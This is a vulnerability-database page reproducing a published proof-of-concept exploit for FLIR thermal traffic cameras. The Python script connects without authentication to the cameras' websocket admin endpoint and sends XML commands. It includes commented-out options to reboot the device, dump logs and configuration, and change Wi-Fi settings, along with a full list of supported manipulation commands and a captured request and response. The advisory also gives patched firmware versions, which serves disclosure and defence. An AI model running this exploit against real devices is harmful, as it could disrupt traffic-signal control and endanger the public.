Vulners
Lucene search
FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | FLIR Thermal Traffic Cameras 安全漏洞 | 24 Dec 202500:00 | – | cnnvd |
 | CVE-2018-25140 | 24 Dec 202519:27 | – | cve |
 | CVE-2018-25140 FLIR Thermal Traffic Cameras V1.01-0bb5b27 Unauthenticated Websocket Device Manipulation | 24 Dec 202519:27 | – | cvelist |
 | EUVD-2025-205342 | 24 Dec 202521:30 | – | euvd |
 | CVE-2018-25140 | 24 Dec 202520:15 | – | nvd |
 | PT-2025-53360 | 24 Dec 202500:00 | – | ptsecurity |
 | CVE-2018-25140 FLIR Thermal Traffic Cameras V1.01-0bb5b27 Unauthenticated Websocket Device Manipulation | 24 Dec 202519:27 | – | vulnrichment |
<html><body><p>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
#
# Affected firmware version: V1.01-0bb5b27 (TrafiOne) Codename: TrafiOne
# E1.00.09 (TI BPL2 EDGE) Codename: TIIP4EDGE
# V1.02.P01 (TI x-stream) Codename: TIIP2
# V1.05.P01 (ThermiCam) Codename: ThermiCam
# V1.04.P02 (ThermiCam) Codename: ThermiCam
# V1.04 (ThermiCam) Codename: ThermiCam
# V1.01.P02 (ThermiCam) Codename: ThermiCam
# V1.05.P03 (TrafiSense) Codename: TrafiSense
# V1.06 (VIP-IP) Codename: VIP-IP
# V1.02.P02 (TrafiRadar) Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name Firmware Released
# ----------------------------------------------------
# ThermiCam / TrafiSense E1.06.03 17.09.2018
# TI BPL2 EDGE V1.00 17.09.2018
# TI x-stream E1.03.02 17.09.2018
# TrafiOne E1.02.02 17.09.2018
# ----------------------------------------------------
#
# Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
# and dynamic traffic signal control. Offered in a compact and affordable
# package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
# adapt traffic signals based on the presence detection of vehicles, bicycles
# and pedestrians while at the same time generating high resolution data at
# intersections and in urban environments. FLIR TrafiOne helps traffic engineers
# to improve traffic flows, reduce vehicle idling time, monitor congestion,
# enhance safety for vulnerable road users, collect data and measure travel and
# delay times for different transport modes.
#
# FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
# video detector in a single unit. FLIR TrafiCam detects moving and stationary
# vehicles at signalized intersections. Via detection outputs or via IP protocol,
# vehicle presence information is transmitted to the traffic controller so that
# signal timing can be adjusted dynamically. This way, vehicle waiting time at
# traffic lights is reduced and traffic flows are optimized.
#
# FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
# detection. TrafiSense does not need light to operate, but uses the thermal energy
# emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
# and bikes in the darkest of nights, over a long range and in the most difficult
# weather conditions. The result is reliable, 24/7 traffic detection for a wide
# range of applications.
#
# FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
# radar. TrafiRadar is typically used for stop bar and advance vehicle presence
# detection, traffic adaptive systems, and dilemma-zone protection and thus improves
# traffic safety and efficiency at signalized intersections. TrafiRadar will warn
# traffic light controllers whenever a vehicle is present in the dilemma zone, either
# extending green or red lights to improve overall safety.and stationary vehicles at
# signalized intersections and collect traffic data at intersections or interurban
# roads. Via detection outputs or via IP protocol, vehicle presence information is
# transmitted to the traffic controller so that signal timing can be adjusted
# dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
# used for traffic monitoring in a control room.
#
# The VIP series offers multi-functional Video Image Processing modules for traffic
# control. VIP boards integrate automatic incident detection, data collection,
# recording of pre and post incident image sequences and streaming video in one
# board. VIP modules have been installed for road and tunnel projects all over the
# world.
#
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
# WebSocket Secure connection making the network traffic disclosed in plain-text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#
# Tested on: nginx/1.12.1
# nginx/1.10.2
# nginx/1.8.0
# Websocket/13 (RFC 6455)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
#
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
#
#
# 26.07.2018
#
from websocket import create_connection as t00t
import time
import sys
endpoint = "/ws/xml2"
if (len(sys.argv) <= 2):
print '[*] Usage: exploit.py <ipaddress> <port>'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
# Supported message types:
'''
<message type="SupportedMessages">
<message type="GetMessageConstraints"></message>
<message type="GetSupportedMessages"></message>
<message type="Session"></message>
<message type="Subscription"></message>
<message type="ClearData"></message>
<message type="GetConnectionInformation"></message>
<message type="GetData"></message>
<message type="GetEvents"></message>
<message type="GetLostData"></message>
<message type="GetManagedBy"></message>
<message type="GetPresenceData"></message>
<message type="GetPresenceLevel"></message>
<message type="GetPresenceLevelHistory"></message>
<message type="GetStorageLimits"></message>
<message type="SetConnectionSettings"></message>
<message type="SetManagedBy"></message>
<message type="ClearBootCount"></message>
<message type="ClearHistogram"></message>
<message type="ClearStoredCounter"></message>
<message type="ClearSystemLogs"></message>
<message type="CreateAviSequence"></message>
<message type="DoBadStuff"></message> <-- ;]]
<message type="ForceEvent"></message>
<message type="ForceKeyframe"></message>
<message type="GetBootCount"></message>
<message type="GetBplSettings"></message>
<message type="GetCameraConfiguration"></message>
<message type="GetCameraDefinitions"></message>
<message type="GetCameraSettings"></message>
<message type="GetConfiguration"></message>
<message type="GetConstraints"></message>
<message type="GetCpuStatistics"></message>
<message type="GetDateTime"></message>
<message type="GetDisplayOverlay"></message>
<message type="GetEventLog"></message>
<message type="GetEventsDescription"></message>
<message type="GetFrameFlow"></message>
<message type="GetHardwareInformation"></message>
<message type="GetHardwareSensors"></message>
<message type="GetHistogram"></message>
<message type="GetImage"></message>
<message type="GetImageSharpness"></message>
<message type="GetLeptonSettings"></message>
<message type="GetLoggingActivation"></message>
<message type="GetMemoryStatistics"></message>
<message type="GetNumberOfOutputs"></message>
<message type="GetOpenEvents"></message>
<message type="GetOutputsState"></message>
<message type="GetPermissions"></message>
<message type="GetProductInformation"></message>
<message type="GetSocketInformation"></message>
<message type="GetState"></message>
<message type="GetStoredCounter"></message>
<message type="GetSystemLogs"></message>
<message type="GetTemperature"></message>
<message type="GetThermalQualityHistogram"></message>
<message type="GetThermalQualityReferenceImage"></message>
<message type="GetThreadInformation"></message>
<message type="GetTime"></message>
<message type="GetTranslations"></message>
<message type="GetUpTime"></message>
<message type="GetVersion"></message>
<message type="GetVoltage"></message>
<message type="GetWifiInformation"></message>
<message type="KeepAlive"></message>
<message type="Notify"></message>
<message type="PauseDetectionFramework"></message>
<message type="Reboot"></message>
<message type="SetBplSettings"></message>
<message type="SetCameraConfiguration"></message>
<message type="SetCameraSettings"></message>
<message type="SetConfiguration"></message>
<message type="SetConstraintsFilter"></message>
<message type="SetDateTime"></message>
<message type="SetDisplayOverlay"></message>
<message type="SetHardwareInformation"></message>
<message type="SetLeptonSettings"></message>
<message type="SetLoggingActivation"></message>
<message type="SetTime"></message>
<message type="SetWifiInformation"></message>
<message type="UpdateFrameFlow"></message>
</message>
'''
socket = t00t("ws://"+host+":"+port+endpoint)
#print 'Sending Reboot message type (DoS)...'
#msg = '<message type='\"Reboot\"'></message>'
#print 'Getting supported messages...'
#msg = '<message type='\"GetSupportedMessages\"'></message>'
#print 'Getting system logs...'
#msg = '<message type='\"GetSystemLogs\"'></message>'
#print 'Getting device configuration...'
#msg = '<message type='\"GetConfiguration\"'></message>'
#print 'Setting new Wifi information...'
#msg ='''
#<message type="SetWifiInformation">
# </message>
#
#'''
msg = '<message type='\"GetProductInformation\"'></message>'
socket.send(msg)
print 'Message sent.'
print 'Receiving...'
time.sleep(2)
priem = socket.recv()
print 'Received data: \n%s' % priem
socket.close()
</port></ipaddress></p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Oct 2018 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.17.5
CVSS 49.3
EPSS0.00133
SSVC